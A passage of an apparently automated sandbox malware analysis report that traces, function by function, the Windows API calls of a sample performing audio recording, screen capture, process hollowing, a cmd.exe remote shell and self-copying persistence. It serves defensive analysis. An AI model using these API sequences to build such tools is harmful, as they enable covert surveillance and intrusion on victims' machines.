                                                                                • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                • Opcode Fuzzy Hash: 1a0008a7b032c45d953091ac1afb4bf8007bf4c9a0a3f4b2fa71c5b2a3510a05
                                                                                • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                Function 0041A1BB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                • SetEvent.KERNEL32 ref: 0041A38A
                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                • API String ID: 738084811-1408154895
                                                                                • Opcode ID: 83406c3b7a19171203d9cdb86f2d243da5116594bd3113cd46328f7e28b7c8f9
                                                                                • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                • Opcode Fuzzy Hash: 83406c3b7a19171203d9cdb86f2d243da5116594bd3113cd46328f7e28b7c8f9
                                                                                • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                Function 0079151C Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 189synchronizationsleepfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 0079153B
                                                                                • ExitProcess.KERNEL32 ref: 00791784
                                                                                  • Part of subcall function 007928C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 007928E0
                                                                                  • Part of subcall function 007928C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 007928F9
                                                                                  • Part of subcall function 007928C4: RegCloseKey.ADVAPI32(?), ref: 00792904
                                                                                  • Part of subcall function 0079B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B89A
                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 007915C2
                                                                                • OpenProcess.KERNEL32(00100000,00000000,0078E3BB,?,?,?,?,00000000), ref: 007915D1
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 007915DC
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 007915E3
                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 007915E9
                                                                                  • Part of subcall function 00792A3C: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 00792A4A
                                                                                  • Part of subcall function 00792A3C: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0078BBB3,004660E0,00000001,000000AF,00465554), ref: 00792A65
                                                                                  • Part of subcall function 00792A3C: RegCloseKey.ADVAPI32(?,?,?,?,0078BBB3,004660E0,00000001,000000AF,00465554), ref: 00792A70
                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 0079161A
                                                                                • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 00791676
                                                                                • GetTempFileNameW.KERNEL32(?,0046B7CC,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00791690
                                                                                • lstrcatW.KERNEL32(?,0046B7D8,?,?,?,?,?,?,?,00000000), ref: 007916A2
                                                                                  • Part of subcall function 0079B7F6: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,0079B90C,00000000,00000000,?,?,0078A270), ref: 0079B852
                                                                                  • Part of subcall function 0079B7F6: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,0079B90C,00000000,00000000,?,?,0078A270), ref: 0079B866
                                                                                  • Part of subcall function 0079B7F6: CloseHandle.KERNEL32(00000000,?,00000000,0079B90C,00000000,00000000,?,?,0078A270), ref: 0079B873
                                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 0079172B
                                                                                • OpenProcess.KERNEL32(00100000,00000000,0078E3BB,?,?,?,?,00000000), ref: 00791740
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 0079174B
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 00791752
                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00791758
                                                                                  • Part of subcall function 0079B7F6: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0079B90C,00000000,00000000,?), ref: 0079B835
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExistsExitMutexNamePointerQuerySleepWritelstrcat
                                                                                • String ID: 0DG$@CG$WDH$exepath
                                                                                • API String ID: 1212092484-1464086911
                                                                                • Opcode ID: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                                                • Instruction ID: 5678d2f98de9078b36884e3e96b75136aeddb1d592d6716cb0e0cb76cc7f226d
                                                                                • Opcode Fuzzy Hash: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                                                • Instruction Fuzzy Hash: 7251C471A44306ABDF10B7A0BC89EFE336D9B44751F5041A5F901A71D3EF788E428B58
                                                                                Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Write$Create
                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                • API String ID: 1602526932-4212202414
                                                                                • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe,00000001,004068B2,C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                • API String ID: 1646373207-3984297062
                                                                                • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                Function 00798206 Relevance: 31.8, APIs: 21, Instructions: 324windowmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateDCA.GDI32(0046BAC8,00000000,00000000,00000000), ref: 00798220
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0079822B
                                                                                  • Part of subcall function 007986B9: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 007986E9
                                                                                • CreateCompatibleBitmap.GDI32(?,00000000), ref: 007982AC
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 007982D2
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 007982FA
                                                                                • GetCursorInfo.USER32(?), ref: 0079831C
                                                                                • GetIconInfo.USER32(?,?), ref: 00798332
                                                                                • DeleteObject.GDI32(?), ref: 00798361
                                                                                • DeleteObject.GDI32(?), ref: 0079836E
                                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 0079837B
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00471DE4,00000000,00000000,00660046), ref: 007983AB
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 007983DA
                                                                                • LocalAlloc.KERNEL32(00000040,00000028), ref: 00798423
                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00798446
                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 007984AF
                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 007984D2
                                                                                • DeleteObject.GDI32(00000000), ref: 007984EC
                                                                                • GlobalFree.KERNEL32(00CC0020), ref: 007984F7
                                                                                • DeleteObject.GDI32(00000000), ref: 007985AB
                                                                                • GlobalFree.KERNEL32(?), ref: 007985B2
                                                                                • DeleteObject.GDI32(?), ref: 00798608
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object$Delete$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                • String ID:
                                                                                • API String ID: 615876539-0
                                                                                • Opcode ID: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                                                • Instruction ID: d9fbfeba100e9c807be759a73419f1d13616c7579a26747eb59fc4cd895b7eab
                                                                                • Opcode Fuzzy Hash: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                                                • Instruction Fuzzy Hash: 39C17B71508345AFD7609F24EC48B6BBBE8FF85741F04082DF989972A2DB34E904CB56
                                                                                Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 0040BC75
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                • _wcslen.LIBCMT ref: 0040BD54
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe,00000000,00000000), ref: 0040BDF2
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                • _wcslen.LIBCMT ref: 0040BE34
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                • String ID: 6$C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$del$open$BG$BG
                                                                                • API String ID: 1579085052-2367752573
                                                                                • Opcode ID: 771e636904fad5e3248d91ed26e8a99c9c578bafc1c6ca04f7ca2b005c5ac86a
                                                                                • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                • Opcode Fuzzy Hash: 771e636904fad5e3248d91ed26e8a99c9c578bafc1c6ca04f7ca2b005c5ac86a
                                                                                • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                • _wcslen.LIBCMT ref: 0041B2DB
                                                                                • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                • GetLastError.KERNEL32 ref: 0041B313
                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                • GetLastError.KERNEL32 ref: 0041B370
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                • String ID: ?
                                                                                • API String ID: 3941738427-1684325040
                                                                                • Opcode ID: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                                                                                • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                • Opcode Fuzzy Hash: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                                                                                • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                Function 0079B422 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?), ref: 0079B43D
                                                                                • _memcmp.LIBVCRUNTIME ref: 0079B455
                                                                                • lstrlenW.KERNEL32(?), ref: 0079B46E
                                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0079B4A9
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0079B4BC
                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0079B500
                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0079B51B
                                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0079B533
                                                                                • _wcslen.LIBCMT ref: 0079B542
                                                                                • FindVolumeClose.KERNEL32(?), ref: 0079B562
                                                                                • GetLastError.KERNEL32 ref: 0079B57A
                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0079B5A7
                                                                                • lstrcatW.KERNEL32(?,?), ref: 0079B5C0
                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0079B5CF
                                                                                • GetLastError.KERNEL32 ref: 0079B5D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                • String ID: ?
                                                                                • API String ID: 3941738427-1684325040
                                                                                • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                • Instruction ID: 3353b64b0df217421d8402333b0ac89e2c0f14eb883bcfa989447fef4c9556ac
                                                                                • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                • Instruction Fuzzy Hash: EF418171508705ABDB20DFA4FD88AAB77ECAB44711F00093AF541C2261EB78CA58DB92
                                                                                Function 007CE475 Relevance: 27.4, APIs: 18, Instructions: 419COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                                                                                • String ID:
                                                                                • API String ID: 2719235668-0
                                                                                • Opcode ID: 7acce36c14b6035b1c2eb814a55043d454006441e01e78848d5c2bc81b6dc77b
                                                                                • Instruction ID: 4798b02fca99f6b0d8200ab66e1e80696e9d385fadd738a155b24aaeb7fb5c09
                                                                                • Opcode Fuzzy Hash: 7acce36c14b6035b1c2eb814a55043d454006441e01e78848d5c2bc81b6dc77b
                                                                                • Instruction Fuzzy Hash: E0D12A71A00304AFDF25AF78AC86F6E7BE59F00324F04416DF94697291EA3E9E41CB91
                                                                                Function 007974AC Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 290threadinjectionprocessCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 007975D3
                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 007975EB
                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 00797601
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00797627
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007976A7
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 007976BB
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 007976F2
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 007977BF
                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 007977DC
                                                                                • ResumeThread.KERNEL32(?), ref: 007977E9
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00797801
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 0079780C
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 00797826
                                                                                • GetLastError.KERNEL32 ref: 0079782E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                • String ID: ntdll
                                                                                • API String ID: 3275803005-3337577438
                                                                                • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                • Instruction ID: 99766ae46b3347909346405703ceaf0fb3f0a973029b7582a322a2eedb86695c
                                                                                • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                • Instruction Fuzzy Hash: 68A16C71518304AFDB149F65EC49F6B7BE8FF48345F000829F689C6261E779E844CB69
                                                                                Function 007852A9 Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 280sleepfileprocessCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 007852F5
                                                                                  • Part of subcall function 007B3736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 007B3740
                                                                                  • Part of subcall function 007B3736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 007B3773
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                • __Init_thread_footer.LIBCMT ref: 00785332
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 0078544E
                                                                                  • Part of subcall function 007B3780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 007B378B
                                                                                  • Part of subcall function 007B3780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 007B37C8
                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 007854A6
                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 007854CB
                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 007854F8
                                                                                  • Part of subcall function 007B3B0C: __onexit.LIBCMT ref: 007B3B12
                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 007855F5
                                                                                • Sleep.KERNEL32(00000064,00000062,00465554), ref: 0078560F
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00785628
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterFileInit_thread_footerLeaveProcessSleep$CreateNamedPeekPipeReadTerminateWrite__onexitsend
                                                                                • String ID: P\G$P\G$P\G$P\G$P\G$cmd.exe
                                                                                • API String ID: 121539554-3292008770
                                                                                • Opcode ID: 797804256bd83e4a27056d5b7dd8b844625091c3a01af072158c3512f2156987
                                                                                • Instruction ID: b4f6e161479d183872e33658946139ed6530ec3ef655def89f5185ced9fd036a
                                                                                • Opcode Fuzzy Hash: 797804256bd83e4a27056d5b7dd8b844625091c3a01af072158c3512f2156987
                                                                                • Instruction Fuzzy Hash: C9912C71680704EFD711BB24ED89F6E3799EB40341F50403DF909AE1A2EEAC9C448769
                                                                                Function 0044E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
